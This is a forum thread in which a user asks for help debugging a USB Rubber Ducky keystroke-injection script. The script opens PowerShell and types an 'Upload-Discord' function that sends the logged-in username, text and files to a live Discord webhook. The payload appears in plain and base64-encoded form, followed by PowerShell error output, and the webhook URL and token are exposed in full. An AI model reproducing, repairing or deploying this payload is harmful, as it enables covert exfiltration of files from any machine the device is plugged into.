[Ducky script not working (Includes all details)]

20 hours ago, dark_pyrro said:

Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script.

What are you using to encode the Ducky script itself into an inject.bin? Are you using a language when encoding that corresponds with the target keyboard language (if not US)?

BTW, both your screenshot and the included base64 code is exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it.

I used Jakobys PowerShell-to-ducky-converter to convert PowerShell functions to ducky, I've only seen it use the US keyboard (Target keyboard). This converter has the option for encoding, which I tried out, and did have success running it, though im unsure if the version I posted worked....But I did have success with it before. Here's the git for the converter if you are curious. ( https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter ) The main question I have though is, what exactly is throwing the error in the plane text ducky? Like I said before it works fine when pasted into PowerShell, but for some reason when the ducky script is typing it out, the formatting is off when compared to the PowerShell script and it never seems to work.

Also, if I knew how to edit posts, I would take the discord hook out.... I was clearly not paying attention very well and was exited to find an active forum on the matter . I can always make a new one though!

[Ducky script not working (Includes all details)]

So im looking for guidance here. 

In my PowerShell script I use a function, it exports a file/ text to a discord webhook. When pasted into PowerShell, the function works fine. But when I convert it to a ducky script I get some errors that I don't get before. Here's the weird thing, when I encode the ducky script with base64, there's no spaces or formatting and it works fine. So I would assume its some type of formatting in my ducky script that is causing the error. When its encoded, I cannot reference other variables from outside the function so I need it to work in plain text. Anything helps.

 

PS Script:

function Upload-Discord {

[CmdletBinding()]
param (
    [parameter(Position=0,Mandatory=$False)]
    [string]$file,
    [parameter(Position=1,Mandatory=$False)]
    [string]$text 
)

$hookurl = 'my discord webhook'

$Body = @{
  'username' = $env:username
  'content' = $text
}

if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};

if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}

 

 

Converted to ducky:

DELAY 2000
GUI r
DELAY 2000
STRING powershell
DELAY 250
ENTER
DELAY 2000
STRING function Upload-Discord {
STRING 
STRING [CmdletBinding()]
STRING param (
STRING [parameter(Position=0,Mandatory=$False)]
STRING [string]$file,
STRING [parameter(Position=1,Mandatory=$False)]
STRING [string]$text
STRING )
STRING 
STRING $hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'
STRING 
STRING $Body = @{
STRING 'username' = $env:username
STRING 'content' = $text
STRING }
STRING 
STRING if (-not ([string]::IsNullOrEmpty($text))){
STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};
STRING 
STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
STRING }
STRING 

 

Converted to ducky (Encoded) works fine for some reason?:

DELAY 2000
GUI r
DELAY 2000
STRING powershell
DELAY 250
ENTER
DELAY 250
STRING powershell -enc '
DELAY 250
STRING ZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQALQBEAGkAcwBjAG8AcgBkACAAewANAAoADQAKAFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQANAAoAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIABbAHAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuAD0AMAAsAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABGAGEAbABzAGUAKQBdAA0ACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAGYAaQBsAGUALAANAAoAIAAgACAAIABbAHAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuAD0AMQAsAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABGAGEAbABzAGUAKQBdAA0ACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAHQAZQB4AHQAIAANAAoAKQANAAoADQAKACQAaABvAG8AawB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBkAGkAcwBjAG8AcgBkAC4AYwBvAG0ALwBhAHAAaQAvAHcAZQBiAGgAbwBvAGsAcwAvADEAMQA5ADQAMgAxADUANQA0ADQAMwA0ADIAMQA5ADYAMgA3ADUALwBkAGcARgBsAGwANwBYAFAALQBtAEwAUwBpAE4AVwBIAHgAVQBvAEYAawBTAHAAdQBLAFQANgAyAFUAZgA1AEcATgAtAF8ASQBsAGMAdQBCADQAVgBrAG4AegBXAGsAeQA5AFUAdwBBAGwAUABvAFEAUgBlAHoAeAB6AEwAbwBJAFcAUgBKAEkAJwANAAoADQAKACQAQgBvAGQAeQAgAD0AIABAAHsADQAKACAAIAAnAHUAcwBlAHIAbgBhAG0AZQAnACAAPQAgACQAZQBuAHYAOgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAnAGMAbwBuAHQAZQBuAHQAJwAgAD0AIAAkAHQAZQB4AHQADQAKAH0ADQAKAA0ACgBpAGYAIAAoAC0AbgBvAHQAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAdABlAHgAdAApACkAKQB7AA0ACgBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuAC8ASgBzAG8AbgAnACAALQBVAHIAaQAgACQAaABvAG8AawB1AHIAbAAgACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEIAbwBkAHkAIAAoACQAQgBvAGQAeQAgAHwAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AKQB9ADsADQAKAA0ACgBpAGYAIAAoAC0AbgBvAHQAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAZgBpAGwAZQApACkAKQB7AGMAdQByAGwALgBlAHgAZQAgAC0ARgAgACIAZgBpAGwAZQAxAD0AQAAkAGYAaQBsAGUAIgAgACQAaABvAG8AawB1AHIAbAB9AA0ACgB9AA0ACgANAAoA'
ENTER

 

PS Errors:

PS C:\WINDOWS\system32> function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandatory=$False)]`n[string]$text `n)`n`n$hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'username' = $env:username`n'content' = $text`n}`n`nif (-not ([string]::IsNullOrEmpty($text))){`nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};`n`nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING

At line:1 char:45
+ function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(P ...
+                                             ~
An expression was expected after '('.
At line:1 char:79
+ ... scord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandator ...
+                                                                 ~
Missing argument in parameter list.
At line:1 char:137
+ ... =0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandator ...
+                                                                 ~
Missing argument in parameter list.
At line:1 char:327
+ ... puKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'usern ...
+                                                                  ~
The hash literal was incomplete.
At line:1 char:621
+ ... IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING
+                                                                  ~
Unexpected token '}' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression



PS C:\WINDOWS\system32> Upload-Discord -file "$dir\output.txt"

Upload-Discord : The term 'Upload-Discord' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ Upload-Discord -file "$dir\output.txt"
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Upload-Discord:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

PS PIC:   https://ibb.co/tXpxLmc